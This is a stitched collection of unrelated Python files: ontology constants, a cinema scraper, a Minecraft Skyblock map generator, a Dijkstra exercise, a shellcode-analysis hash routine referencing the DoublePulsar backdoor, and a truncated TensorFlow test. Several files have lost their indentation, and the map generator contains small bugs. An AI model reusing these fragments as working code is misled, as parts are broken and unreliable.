Ortholog = 'RO:HOM0000017'
LeastDivergedOrtholog = 'RO:HOM0000020'
Homolog = 'RO:HOM0000007'
Paralog = 'RO:HOM0000011'
InParalog = 'RO:HOM0000023'
OutParalog = 'RO:HOM0000024'
Ohnolog = 'RO:HOM0000022'
Xenolog = 'RO:HOM0000018'
class Evidence():
axiom_has_evidence = 'RO:0002612'
evidence_with_support_from = 'RO:0002614'
has_supporting_reference = 'SEPIO:0000124'
information_artefact = 'IAO:0000311'
_prefixmap = {
'SEPIO': 'http://purl.obolibrary.org/obo/SEPIO_',
'IAO': 'http://purl.obolibrary.org/obo/IAO_',
        'RO': 'http://purl.obolibrary.org/obo/RO_',
}
class OboRO():
part_of = 'BFO:0000050'
occurs_in = 'BFO:0000066'
enabled_by = 'RO:0002333'
enables = 'RO:0002327'
involved_in = 'RO:0002331'
in_taxon = 'RO:0002162'
colocalizes_with = 'RO:0002325'
def map_legacy_pred(pred):
if '#' in pred:
lbl = pred.split('#')[-1]
if lbl == 'part_of':
return 'BFO:0000050'
if '_part_of' in lbl:
# for FMA
return 'BFO:0000050'
return pred
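# Illustrative examples: legacy '#part_of'-style predicates are normalised to the
# BFO identifier, anything else passes through unchanged.
#   map_legacy_pred('http://example.org/vocab#part_of') -> 'BFO:0000050'
#   map_legacy_pred('RO:0002333') -> 'RO:0002333'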
|
StarcoderdataPython
|
315977
|
from typing import Dict, List
import requests_cache
from afacinemas_scraper.core.cinemas import ScraperCinemas
from afacinemas_scraper.core.lancamentos import ScraperLancamentos
from afacinemas_scraper.core.precos import ScraperPrecos
requests_cache.install_cache(
"cache_afacinemas", backend="sqlite", expire_after=600
)
class Scraper:
def get_cinemas(self) -> List[Dict]:
sc = ScraperCinemas()
return sc.extract()
def get_proximos_lancamentos(self) -> List[Dict]:
sc = ScraperLancamentos()
return sc.extract()
def get_precos_ingressos(self, codigo: int):
sc = ScraperPrecos()
return sc.extract(codigo)
if __name__ == "__main__":
afa = Scraper()
cinemas = afa.get_cinemas()
proximos_lancamentos = afa.get_proximos_lancamentos()
print(afa.get_precos_ingressos(codigo=10))
|
StarcoderdataPython
|
373472
|
<gh_stars>1-10
#!/usr/bin/env python
import settings
from pymclevel import MCInfdevOldLevel
from pymclevel import TileEntity
try:
TileEntity.baseStructures['Control']
except KeyError:
from pymclevel import nbt
TileEntity.baseStructures['Control'] = (
('Command', nbt.TAG_String),
('LastOutput', nbt.TAG_String),
)
from pymclevel import TAG_Compound
from pymclevel import TAG_List
from pymclevel import TAG_Short
from pymclevel import TAG_Byte
from pymclevel import TAG_String
# from pymclevel.mclevelbase import ChunkNotPresent
from pymclevel.items import items
# So we can use relative figures and shift them all around slightly
base = 4
class LevelSlice(object):
'''
This allows interacting with a slice of the world without worrying about
chunk boundaries.
'''
# TODO: Try pre-loading all the chunks for the slice and compare that
# against loading on demand.
def __init__(self, level, east=0, south=0, up=64, radius=16):
'''
up defaults to 64 to allow vertical positions to be specified
relative to standard overworld sea level.
'''
self.level = level
self.east = east
self.south = south
self.up = up
self.radius = radius
self.chunks = {}
self.load()
def load(self):
min_east_chunk = (self.east - self.radius) // 16
max_east_chunk = (self.east + self.radius) // 16
min_south_chunk = (self.south - self.radius) // 16
max_south_chunk = (self.south + self.radius) // 16
for east_chunk in range(min_east_chunk, max_east_chunk + 1):
for south_chunk in range(min_south_chunk, max_south_chunk + 1):
self.chunks[east_chunk, south_chunk] = grabChunk(
self.level,
east_chunk,
south_chunk,
)
def save(self):
for chunk in self.chunks:
self.chunks[chunk].chunkChanged()
def empty(self):
self.set_blocks(
block_id=0,
minimum=(self.east - self.radius, self.south + self.radius),
maximum=(self.east - self.radius, self.south + self.radius),
)
def set_blocks(self,
block_id,
block_data=0,
minimum=None,
maximum=None,
):
# A very useful shorthand
if not minimum:
raise ValueError('set_blocks() requires a minimum point')
if not maximum:
raise ValueError('set_blocks() requires a maximum point')
if len(minimum) == 3:
min_east, min_south, min_up = minimum
elif len(minimum) == 2:
min_east, min_south = minimum
min_up = 0
else:
raise ValueError('set_blocks() received an invalid minimum point')
if len(maximum) == 3:
max_east, max_south, max_up = maximum
        elif len(maximum) == 2:
max_east, max_south = maximum
max_up = 255
else:
raise ValueError('set_blocks() received an invalid maximum point')
for chunk_east, chunk_south in self.chunks.keys():
chunk = self.chunks[chunk_east, chunk_south]
# Don't do anything if this chunk doesn't intersect the region
if min_east > chunk_east * 16 + 15 or max_east < chunk_east * 16:
continue
if (min_south > chunk_south * 16 + 15
or max_south < chunk_south * 16):
continue
# Normalize relative to this chunk
c_min_east = min_east % 16
c_max_east = max_east % 16
c_min_south = min_south % 16
c_max_south = max_south % 16
if min_east < chunk_east * 16:
c_min_east = 0
if max_east > chunk_east * 16 + 15:
c_max_east = 15
if min_south < chunk_south * 16:
c_min_south = 0
if max_south > chunk_south * 16 + 15:
c_max_south = 15
chunk.Blocks[
c_min_east:c_max_east + 1,
c_min_south:c_max_south + 1,
min_up:max_up + 1,
] = block_id
chunk.Data[
c_min_east:c_max_east + 1,
c_min_south:c_max_south + 1,
min_up:max_up + 1,
] = block_data
def add_entity(self, entity, position):
east, south, up = position
chunk_east = east // 16
chunk_south = south // 16
if not (chunk_east, chunk_south) in self.chunks:
raise KeyError('position not in world slice: {}'.format(position))
chunk = self.chunks[chunk_east, chunk_south]
TileEntity.setpos(entity, (east, up, south))
chunk.TileEntities.append(entity)
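# Usage sketch (illustrative block ids and coordinates): fill a small stone platform
# around the origin without worrying about chunk boundaries.
#   world_slice = LevelSlice(level, east=0, south=0, up=64, radius=16)
#   world_slice.set_blocks(block_id=1, minimum=(-8, -8, 60), maximum=(8, 8, 63))
#   world_slice.save()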
def main():
# Set random_seed explicitly just to avoid randomness
print('Creating level.')
level = MCInfdevOldLevel(settings.output_filename,
create=True,
random_seed=1)
overworld = level
# Superflat: version 2, one layer of air, deep ocean biome
overworld.root_tag['Data']['generatorName'] = TAG_String(u'flat')
overworld.root_tag['Data']['generatorOptions'] = TAG_String(u'2;0;24;')
nether = level.getDimension(-1)
the_end = level.getDimension(1)
if settings.creative:
level.GameType = level.GAMETYPE_CREATIVE
# overworld
print('Generating overworld.')
create_empty_chunks(overworld, radius=15)
dirt_island(overworld, 0, 0)
sand_island(overworld, -3, 0)
bedrock_island(overworld, 50, -20)
spawn_island(overworld, 1000000, 1000000)
biomify(overworld)
# nether
print('Generating nether.')
nether_radius = 64 # 1 km to mainland
create_empty_chunks(nether, radius=nether_radius)
create_bedrock_fence(nether, radius=nether_radius)
soul_sand_island(nether, 0, 0)
# the_end
# Manually creating the_end does NOT spawn an ender dragon, so I don't
# need to figure out how to remove it.
print('Generating the end.')
create_empty_chunks(the_end, radius=20)
obsidian_island(the_end, 6, 0)
portal_island(the_end, 4, 0)
print('Finalizing and saving.')
level.generateLights()
level.saveInPlace()
def item_stack(item):
item_tag = TAG_Compound()
item_tag.name = 'tag'
item_tag['id'] = TAG_Short(item['id'])
item_tag['Damage'] = TAG_Short(item['damage'])
item_tag['Count'] = TAG_Byte(item['count'])
item_tag['Slot'] = TAG_Byte(item['slot'])
return item_tag
def signed_book(title='', pages=[''], author='Skyblock CE'):
book_tag = TAG_Compound()
book_tag.name = 'tag'
book_tag['title'] = title
book_tag['author'] = author
book_tag['pages'] = TAG_List(name='pages', list_type=TAG_String)
for page in pages:
book_tag['pages'].append(TAG_String(page))
item_tag = TAG_Compound()
item_tag['id'] = TAG_Short(items.names['Written Book'])
item_tag['Damage'] = TAG_Byte(0)
item_tag['Count'] = TAG_Byte(1)
item_tag['tag'] = book_tag
return item_tag
def make_chest(level, chunk, pos, contents):
x, z, y = pos
chest_id = level.materials.Chest.ID
chunk.Blocks[x % 16, z % 16, y] = chest_id
chest_facing_west = 4
chunk.Data[x % 16, z % 16, y] = chest_facing_west
chest = TileEntity.Create('Chest')
TileEntity.setpos(chest, (x, y, z))
slot = 0
for item in contents:
try:
item.name # Already a TAG_Compound?
item['Slot'] = TAG_Byte(slot)
chest['Items'].append(item)
except AttributeError:
item['slot'] = slot
chest['Items'].append(item_stack(item))
slot += 1
chunk.TileEntities.append(chest)
def grabChunk(level, chunkX, chunkZ):
try:
level.createChunk(chunkX, chunkZ)
except ValueError:
pass
chunk = level.getChunk(chunkX, chunkZ)
# TODO: Determine if the following call is necessary
chunk.chunkChanged()
return chunk
def clear(level, chunkX, chunkZ):
chunk = grabChunk(level, chunkX, chunkZ)
chunk.Blocks[:, :, :] = 0 # air_id
chunk.Biomes[:, :] = -1 # not yet calculated
chunk.chunkChanged()
return chunk
def create_empty_chunks(level, radius=0):
for chunkX in range(-radius, radius + 1):
for chunkZ in range(-radius, radius + 1):
level.createChunk(chunkX, chunkZ)
def create_bedrock_fence(level, radius=0):
bedrock_id = level.materials.Bedrock.ID
for chunkX in range(-radius, radius + 1):
for chunkZ in range(-radius, radius + 1):
if abs(chunkX) == radius or abs(chunkZ) == radius:
chunk = grabChunk(level, chunkX, chunkZ)
chunk.Blocks[:, :, :128] = bedrock_id
def dirt_island(level, chunkX, chunkZ):
# Main
clear(level, chunkX, chunkZ)
chunk = level.getChunk(chunkX, chunkZ)
# Dirt
dirt_id = level.materials.Dirt.ID
chunk.Blocks[base:base+8, base:base+4, 60:64] = dirt_id
chunk.Blocks[base:base+4, base+4:base+8, 60:64] = dirt_id
# Grass
grass_id = level.materials.Grass.ID
dirt = chunk.Blocks[:, :, 63] == dirt_id
chunk.Blocks[:, :, 63][dirt] = grass_id
chunk.chunkChanged()
# Tree
log_id = level.materials.Wood.ID
leaf_id = level.materials.Leaves.ID
chunk.Blocks[base-1:base+2, base+5:base+10, 67:69] = leaf_id
chunk.Blocks[base-2:base+3, base+6:base+9, 67:69] = leaf_id
chunk.Blocks[base, base+6:base+9, 69:71] = leaf_id
chunk.Blocks[base-1:base+2, base+7, 69:71] = leaf_id
chunk.Blocks[base-2, base+5, 67] = leaf_id
chunk.Blocks[base-2, base+9, 68] = leaf_id
chunk.Blocks[base-1:base+2, base+6:base+9, 69] = leaf_id
chunk.Blocks[base, base+7, 64:70] = log_id
# Chest
contents = [
{
'id': items.names['Ice'],
'count': 1,
'damage': 0,
},
{
'id': items.names['Lava Bucket'],
'count': 1,
'damage': 0,
},
signed_book(
'Book One',
[
'''Contents:
2: Credits
3: Basic Objectives ''', # page 1
'''Credits:
- Noobcrew made the original Skyblock maps
- Intchanter posted ideas in the Skyblock thread
- WesyWesy suggested Intchanter update Skyblock
- CurtJen and Gaudeon: helped test''', # page 2
'''Basic objectives:
- Farm saplings: acacia, birch, dark oak, jungle, oak, spruce
- Farm wheat, melons, pumpkins, cactus, carrots, potatoes
- Farm tall grass, vines, dandelions, poppies''', # page 3
'''- Collect arrows, bones, ender pearls, glass bottles
- Collect glowstone dust, gold nuggets, gunpowder, iron, redstone dust,
- Collect rotten flesh, slime balls, spider eyes, string
- Make charcoal
- Generate cobblestone and smooth stone''', # page 4
'''- Farm beef, chicken, eggs, feathers, ink sacs
- Farm leather, mutton, pork chops, rabbit, rabbit hide, wool
- Make stone tools
- Milk a cow
- Obtain a rabbit foot
- Craft snow golems
- Make leather armor
- Make cake, pumpkin pie, slime blocks''', # page 5
'''- Collect clown fish, fish, lily pads, a nametag
- Collect puffer fish, a saddle, salmon
- Collect a tripwire hook, water bottles''', # page 6
]
),
]
chunkX *= 16
chunkZ *= 16
make_chest(level, chunk, (chunkX+base+7, chunkZ+base+2, 64), contents)
def sand_island(level, chunkX, chunkZ):
# Main
clear(level, chunkX, chunkZ)
chunk = level.getChunk(chunkX, chunkZ)
# Sand
sand_id = level.materials.Sand.ID
chunk.Blocks[base:base+4, base:base+4, 60:64] = sand_id
# Cactus
cactus_id = level.materials.Cactus.ID
chunk.Blocks[base, base+3, 64] = cactus_id
# Chest
contents = [
{'id': items.names['Obsidian'],
'count': 10, 'damage': 0},
# {'id': items.names['Melon Slice'],
{'id': 360, # items.names['Melon'],
'count': 1, 'damage': 0},
{'id': items.names['Spruce Sapling'],
'count': 2, 'damage': 1},
{'id': items.names['Pumpkin Seeds'],
'count': 1, 'damage': 0},
]
# Entities need the world-wide coordinates?!
chunkX *= 16
chunkZ *= 16
make_chest(level, chunk, (chunkX+base+3, chunkZ+base+3, 64), contents)
chunk.chunkChanged()
def soul_sand_island(level, chunkX, chunkZ):
chunk = level.getChunk(chunkX, chunkZ)
# Soul Sand
soul_sand_id = level.materials.SoulSand.ID
chunk.Blocks[base:base+4, base:base+4, 60:64] = soul_sand_id
# Obsidian
obsidian_id = level.materials.Obsidian.ID
chunk.Blocks[base-1, base+1:base+3, 63] = obsidian_id
chunk.Blocks[base-1, base+1:base+3, 67] = obsidian_id
chunk.Blocks[base-1, base, 64:67] = obsidian_id
chunk.Blocks[base-1, base+3, 64:67] = obsidian_id
# Portal
portal_id = level.materials.NetherPortal.ID
chunk.Blocks[base-1, base+1:base+3, 64:67] = portal_id
chunk.Data[base-1, base+1:base+3, 64:67] = 2
# Chest
contents = [
{'id': items.names['Ice'],
'count': 1, 'damage': 0},
{'id': 6, # items.names['Dark Oak Sapling'],
'count': 2, 'damage': 5},
{'id': items.names['Birch Sapling'],
'count': 2, 'damage': 2},
{'id': items.names['Sugar Canes'],
'count': 1, 'damage': 0},
signed_book(
'Book Two',
[
'''Contents:
2: Advanced Objectives
4: Extreme Objectives
6: Crazy Objectives
7: Special Locations''', # page 1
'''Advanced Objectives:
- Collect ghast tears, gold
- Obtain records
- Fight or tame a wolf
- Milk a mooshroom
- Farm the other short flowers:
- red, orange, pink, white tulips
- oxeye daisy, azure bluet, allium, blue orchid''', # page 2
'''- Farm brown and red mushrooms, cocoa beans, nether wart, sugar cane
- Light off a fireworks show''', # page 3
'''Extreme Objectives:
- Collect obsidian
- Farm iron
- Farm two-block flowers: sunflower, peony, rose bush, lilac
- Farm ferns
- Brew some potions
- Play a record
- Enchant your own tools and armor
- Make iron armor and tools''', # page 4
'''- Cure some villagers
- Obtain emeralds, glass, diamond tools, lapis lazuli, name tags,
saddles, enchanted tools, and armor from villagers
- Collect blaze rods, coal, and wither skeleton heads''', # page 5
'''Crazy Objectives:
- Obtain a head from something that isn't a wither skeleton
- Build and kill a wither
- Build a beacon
- Collect lava, gravel, netherrack
- Craft an arrow''', # page 6
'''Special locations:
Nether fortress: -16x,-16z
End portal: 800x,-160z
''', # page 7
],
)
]
chunkX *= 16
chunkZ *= 16
make_chest(level, chunk, (chunkX+base+3, chunkZ+base+3, 64), contents)
# Mushrooms and Netherwart
red_mushroom_id = level.materials.RedMushroom.ID
brown_mushroom_id = level.materials.BrownMushroom.ID
netherwart_id = level.materials.NetherWart.ID
chunk.Blocks[base+3, base, 64] = red_mushroom_id
chunk.Blocks[base, base+3, 64] = brown_mushroom_id
chunk.Blocks[base, base, 64] = netherwart_id
chunk.chunkChanged()
def bedrock_island(level, chunkX, chunkZ):
clear(level, chunkX, chunkZ)
chunk = level.getChunk(chunkX, chunkZ)
# Bedrock
bedrock_id = level.materials.Bedrock.ID
chunk.Blocks[base:base+8, base:base+8, :8] = bedrock_id
# Air core
air_id = level.materials.Air.ID
chunk.Blocks[base+1:base+7, base+1:base+7, 1:7] = air_id
chunk.Blocks[:, :, 5] = air_id
# End portal frame
frame_id = level.materials.PortalFrame.ID
chunk.Blocks[base+1:base+6, base+2:base+5, 1] = frame_id
chunk.Blocks[base+2:base+5, base+1:base+6, 1] = frame_id
chunk.Blocks[base+2:base+5, base+2:base+5, 1] = air_id
chunk.Data[base+2:base+5, base+1, 1] = 0
chunk.Data[base+5, base+2:base+5, 1] = 1
chunk.Data[base+2:base+5, base+5, 1] = 2
chunk.Data[base+1, base+2:base+5, 1] = 3
# Chest
contents = [
{'id': items.names['Fern'],
'count': 1, 'damage': 2},
{'id': 175, # items.names['Sunflower'],
'count': 1, 'damage': 0},
{'id': 175, # items.names['Lilac'],
'count': 1, 'damage': 1},
{'id': 175, # items.names['Rose Bush'],
'count': 1, 'damage': 4},
{'id': 175, # items.names['Peony Bush'],
'count': 1, 'damage': 5},
{'id': 6, # items.names['Acacia Sapling'],
'count': 2, 'damage': 4},
{'id': 6, # items.names['Jungle Sapling'],
'count': 2, 'damage': 3},
{'id': items.names['Cocoa Beans'],
'count': 1, 'damage': 3},
]
chunkX *= 16
chunkZ *= 16
make_chest(level, chunk, (chunkX+base+3, chunkZ+base+3, 1), contents)
# Light this so it's less likely that something will go terribly wrong and
# destroy the chest. Also, stop stealing spawning slots.
torch_id = level.materials.Torch.ID
chunk.Blocks[base+4, base+4, 1] = torch_id
chunk.chunkChanged()
def obsidian_island(level, chunkX, chunkZ):
# End
chunk = level.getChunk(chunkX, chunkZ)
chunk2 = level.getChunk(chunkX, chunkZ - 1)
# Obsidian
# When the player is teleported to the_end, it appears that they go to
# a fixed point at X:100,Y:49(foot),Z:0.
obsidian_id = level.materials.Obsidian.ID
air_id = level.materials.Air.ID
chunk.Blocks[base-2:base+3, 0:base-1, 44:49] = obsidian_id
chunk2.Blocks[base-2:base+3, base-6:, 44:49] = obsidian_id
chunk.Blocks[base-1:base+2, 0:base-2, 45:48] = air_id
chunk2.Blocks[base-1:base+2, base-5:, 45:48] = air_id
contents = [
{
'id': items.names['Diamond'],
'count': 3,
'damage': 0
},
]
chunkX *= 16
chunkZ *= 16
make_chest(level, chunk, (chunkX+base, chunkZ+base-4, 45), contents)
chunk.chunkChanged()
def portal_island(level, chunkX, chunkZ):
# End
chunk = level.getChunk(chunkX, chunkZ)
# Bedrock frame
bedrock_id = level.materials.Bedrock.ID
chunk.Blocks[base-2:base+3, base-1:base+2, 47] = bedrock_id
chunk.Blocks[base-1:base+2, base-2:base+3, 47] = bedrock_id
chunk.Blocks[base-1:base+2, base-3:base+4, 48] = bedrock_id
chunk.Blocks[base-2:base+3, base-2:base+3, 48] = bedrock_id
chunk.Blocks[base-3:base+4, base-1:base+2, 48] = bedrock_id
# Portal
portal_id = level.materials.EnderPortal.ID
chunk.Blocks[base-2:base+3, base-1:base+2, 48] = portal_id
chunk.Blocks[base-1:base+2, base-2:base+3, 48] = portal_id
# Bedrock spire
chunk.Blocks[base, base, 47:52] = bedrock_id
# Torches
torch_id = level.materials.Torch.ID
(chunk.Blocks[base+0, base-1, 50],
chunk.Data[base+0, base-1, 50]) = (torch_id, 4)
(chunk.Blocks[base+1, base+0, 50],
chunk.Data[base+1, base+0, 50]) = (torch_id, 1)
(chunk.Blocks[base+0, base+1, 50],
chunk.Data[base+0, base+1, 50]) = (torch_id, 3)
(chunk.Blocks[base-1, base+0, 50],
chunk.Data[base-1, base+0, 50]) = (torch_id, 2)
# Dragon Egg
dragon_egg_id = level.materials.DragonEgg.ID
chunk.Blocks[base, base, 52] = dragon_egg_id
chunk.chunkChanged()
def spawn_island(level, east, south, target=(6, 6, 64)):
# TODO: Fill the coordinates based on the actual position of the dirt
# and spawn islands
block_radius = 13
pad_min_east = east - 10
pad_min_south = south - 10
pad_max_east = east + 10
pad_max_south = south + 10
pad_up = 0 # Bottom of the world so we can't ever spawn below it
wire_up = pad_up + 1
redstone_up = wire_up + 1
cap_up = redstone_up + 1
slab_id = 126
slab_data = 0 # oak, lower half
tripwire_id = 132
tripwire_data = 4 + 2 # attached and suspended
tripwire_hook_id = 131
tripwire_hook_n_data = 4 + 0 # connected, pointing south
tripwire_hook_s_data = 4 + 2 # connected, pointing north
redstone_wire_id = 55
command_block_id = 137
bedrock_id = 7
command = u''.join([
u'/tp',
u' @p[{s_east},{s_up},{s_south},{radius},c=100]',
u' {t_east}',
u' {t_up}',
u' {t_south}',
]).format(
t_east=target[0],
t_south=target[1],
t_up=target[2],
s_east=east,
s_south=south,
s_up=wire_up,
radius=block_radius,
)
# Place the player
level.setPlayerPosition((east, wire_up + 2, south))
level.setPlayerSpawnPosition((east, wire_up, south))
# Get a world slice object
world_slice = LevelSlice(
level,
east=east,
south=south,
up=pad_up,
radius=block_radius,
)
world_slice.empty()
# Slab level
world_slice.set_blocks(
block_id=slab_id,
block_data=slab_data,
minimum=(pad_min_east, pad_min_south, pad_up),
maximum=(pad_max_east, pad_max_south, pad_up),
)
# Wire level with fully connected tripwire lined N and S with tripwire
# hooks attached to bedrock
world_slice.set_blocks(
block_id=bedrock_id,
minimum=(pad_min_east, pad_min_south - 2, wire_up),
maximum=(pad_max_east, pad_max_south + 2, wire_up),
)
world_slice.set_blocks(
block_id=tripwire_hook_id,
block_data=tripwire_hook_n_data,
minimum=(pad_min_east, pad_min_south - 1, wire_up),
maximum=(pad_max_east, pad_min_south - 1, wire_up),
)
world_slice.set_blocks(
block_id=tripwire_hook_id,
block_data=tripwire_hook_s_data,
minimum=(pad_min_east, pad_max_south + 1, wire_up),
maximum=(pad_max_east, pad_max_south + 1, wire_up),
)
world_slice.set_blocks(
block_id=tripwire_id,
block_data=tripwire_data,
minimum=(pad_min_east, pad_min_south, wire_up),
maximum=(pad_max_east, pad_max_south, wire_up),
)
# Just above the wire, cap the bedrock on the S and add the redstone
# wire and command block on the N
world_slice.set_blocks(
block_id=slab_id,
minimum=(pad_min_east, pad_max_south + 2, redstone_up),
maximum=(pad_max_east, pad_max_south + 2, redstone_up),
)
world_slice.set_blocks(
block_id=redstone_wire_id,
minimum=(pad_min_east, pad_min_south - 2, redstone_up),
maximum=(pad_max_east, pad_min_south - 2, cap_up),
)
world_slice.set_blocks(
block_id=command_block_id,
minimum=(east, pad_min_south - 2, redstone_up),
maximum=(east, pad_min_south - 2, redstone_up),
)
entity = TileEntity.Create('Control')
entity['Command'] = TAG_String(command)
entity['LastOutput'] = TAG_String(u'')
world_slice.add_entity(entity, (east, pad_min_south - 2, redstone_up))
# Cap redstone wire and command block with slabs
world_slice.set_blocks(
block_id=slab_id,
minimum=(pad_min_east, pad_min_south - 2, cap_up),
maximum=(pad_max_east, pad_min_south - 2, cap_up),
)
world_slice.save()
def biomify(level):
desired_biomes = [
10, # Frozen Ocean
10, # Frozen Ocean
26, # Cold Beach
4, # Forest
27, # Birch Forest
132, # Flower Forest
21, # Jungle
5, # Taiga
6, # Swampland
129, # Sunflower Plains
35, # Savannah
1, # Plains
16, # Beach
0, # Ocean
14, # Mooshroom Island
0, # Ocean
]
radius = len(desired_biomes) - 1
for chunkZ in range(-radius, radius + 1):
for chunkX in range(-radius, radius + 1):
chunk = level.getChunk(chunkX, chunkZ)
biome = desired_biomes[max(abs(chunkX), abs(chunkZ))]
chunk.Biomes[:, :] = biome
chunk.chunkChanged()
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
11359261
|
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from pineboolib.fllegacy.flformdb import FLFormDB
from PyQt5 import QtWidgets
def AQFormDB(action_name: str, parent: "QtWidgets.QWidget") -> "FLFormDB":
"""Return a FLFormDB instance."""
from pineboolib.application.utils.convert_flaction import convertFLAction
from pineboolib.application import project
if project.conn is None:
raise Exception("Project is not connected yet")
ac_flaction = project.conn.manager().action(action_name)
ac_xml = convertFLAction(ac_flaction)
ac_xml.load()
ret_ = ac_xml.mainform_widget
if ret_ is None:
raise Exception("mainform_widget is emtpy!")
return ret_
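# Usage sketch (the action name and parent widget are hypothetical):
#   form = AQFormDB("clientes", parent_widget)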
|
StarcoderdataPython
|
11372477
|
<filename>Homework/Dijkstra.py
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 27 13:08:39 2019
@author: wenbin
"""
"""
This program implements Dijkstra's shortest-path algorithm.
Note: vertices are identified by their index in the list, so numbering starts at 0 to stay
consistent with Python; if the problem statement numbers vertices from 1, add 1 to the
reported parent indices.
"""
class Dijkstra():
def __init__(self , AdjacencyMatrix , StartVertex):
self.AdjMat = AdjacencyMatrix
self.Vs = StartVertex
print("Dijkstra algotithm start seccessfully , the matrix is:")
print(self.AdjMat)
print("the start vertex is:" , self.Vs )
def DijkstraProcess(self):
"""
this func use Algorithm Dijkstra to deal with the class's data
"""
        Msize = len(self.AdjMat) #number of vertices (rows of the matrix)
        Vt = [] #vertices whose shortest distance is already finalized
        Uvt = [] #vertices not yet finalized (kept for clarity, not used below)
        dis = [] #tentative distance of each vertex
        dis_certain = [] #finalized distance of each vertex
        pv = [] #parent of each vertex on its shortest path
for i in range(Msize):
dis.append(float("inf"))
dis_certain.append(float("inf"))
pv.append(None)
        dis[self.Vs] = 0
for i in range(Msize):
MinValue = min(dis)
MinIndex = dis.index(MinValue)
dis_certain[MinIndex] = MinValue
dis[MinIndex] = float("inf")
            Vt.append(MinIndex)  # add the newly settled vertex to Vt
for j in range(Msize):
                if (j != MinIndex and j not in set(Vt)) and self.AdjMat[MinIndex][j] < 1000000000: # check that the edge weight is finite (less than inf)
if dis_certain[MinIndex] + self.AdjMat[MinIndex][j] < dis[j]:
dis[j] = dis_certain[MinIndex] + self.AdjMat[MinIndex][j]
pv[j] = MinIndex
print("distance" , dis_certain) #各个节点的最短路,列表中的index就是节点的编号
print("pv" , pv) #各个节点的父节点,从0开始计数
def TestData():
    # initialize the adjacency matrix
AdjacencyMatrix = [[0, 1, 4 , float("inf"), float("inf")],
[1, 0, float("inf"), 2, float("inf")],
[1, float("inf"), 0, float("inf"), 1],
[float("inf"), 3, float("inf"), 0, 3],
[float("inf"), float("inf"), float("inf"), 2, 0]]
    StartVertex = 0  # start vertex of the shortest path
return AdjacencyMatrix , StartVertex
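# Hand-worked expectation for TestData (not asserted anywhere in this script):
# starting from vertex 0, the printed distances are [0, 1, 4, 3, 5] and the
# parents are [None, 0, 0, 1, 2].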
def OR17homework():
    # this example is problem 10.7 from the Operations Research textbook
AdjacencyMatrix = [[0, 2, float("inf") ,8, float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf")],
[float("inf"), 0, float("inf"), 6,1, float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf")],
[1, float("inf"), 0, float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf")],
[float("inf"),float("inf"), 7,0, float("inf"), float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf")],
[float("inf"), float("inf"), float("inf"), 5, 0,float("inf"), float("inf"), float("inf"), 1,float("inf"), float("inf")],
[float("inf"), float("inf"), float("inf"), 1, 3,0,4,float("inf"), float("inf"), float("inf"),float("inf")],
[float("inf"), float("inf"), float("inf"), 2,float("inf"), float("inf"), 0,float("inf"),3,1,float("inf")],
[float("inf"),float("inf"),float("inf"),float("inf"),2,float("inf"),float("inf"),0,float("inf"),float("inf"),9],
[float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),6 , float("inf"),7,0,float("inf"),float("inf")],
[float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),1,0,4],
[float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),2,float("inf"),0]]
    StartVertex = 0  # start vertex of the shortest path
return AdjacencyMatrix , StartVertex
if __name__ == "__main__":
# AdjacencyMatrix , StartVertex = TestData()
AdjacencyMatrix , StartVertex = OR17homework()
DijExample = Dijkstra(AdjacencyMatrix , StartVertex)
DijExample.DijkstraProcess()
|
StarcoderdataPython
|
126875
|
<gh_stars>10-100
#!/usr/bin/env python
########################################################################
# Copyright 2012 Mandiant
# Copyright 2014 FireEye
#
# Mandiant licenses this file to you under the Apache License, Version
# 2.0 (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
#
# Reference:
# https://github.com/mandiant/flare-ida/blob/master/shellcode_hashes/make_sc_hash_db.py
#
########################################################################
DESCRIPTION = "SHIFT LEFT 7 and SUB used in DoublePulsar backdoor"
TYPE = 'unsigned_int'
TEST_1 = 2493113697
def hash(data):
eax = 0
edi = 0
for i in data:
edi = 0xffffffff & (eax << 7)
eax = 0xffffffff & (edi - eax)
eax = eax + (0xff & i)
edi = 0xffffffff & (eax << 7)
eax = 0xffffffff & (edi - eax)
return eax
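if __name__ == '__main__':
    # Minimal usage sketch: the shellcode-hash tooling referenced above feeds this
    # function byte strings of export names. The name that produces TEST_1 is not
    # recorded in this file, so 'ExampleExportName' below is only a placeholder.
    print(hex(hash(b'ExampleExportName')))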
|
StarcoderdataPython
|
1681783
|
# Copyright 2022 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for transformer-based bert encoder network."""
from absl.testing import parameterized
import numpy as np
import tensorflow as tf
from official.nlp.modeling.networks import funnel_transformer
class SingleLayerModel(tf.keras.Model):
def __init__(self, layer):
super().__init__()
self.layer = layer
def call(self, inputs):
return self.layer(inputs)
class FunnelTransformerEncoderTest(parameterized.TestCase, tf.test.TestCase):
def tearDown(self):
super(FunnelTransformerEncoderTest, self).tearDown()
tf.keras.mixed_precision.set_global_policy("float32")
@parameterized.named_parameters(
("mix_truncated_avg_rezero", "mixed_float16", tf.float16, "truncated_avg",
"ReZeroTransformer"), ("float32_truncated_avg_rezero", "float32",
tf.float32, "truncated_avg", "ReZeroTransformer"),
("mix_truncated_avg", "mixed_float16", tf.float16, "truncated_avg",
"TransformerEncoderBlock"),
("float32_truncated_avg", "float32", tf.float32, "truncated_avg",
"TransformerEncoderBlock"), ("mix_max", "mixed_float16", tf.float16,
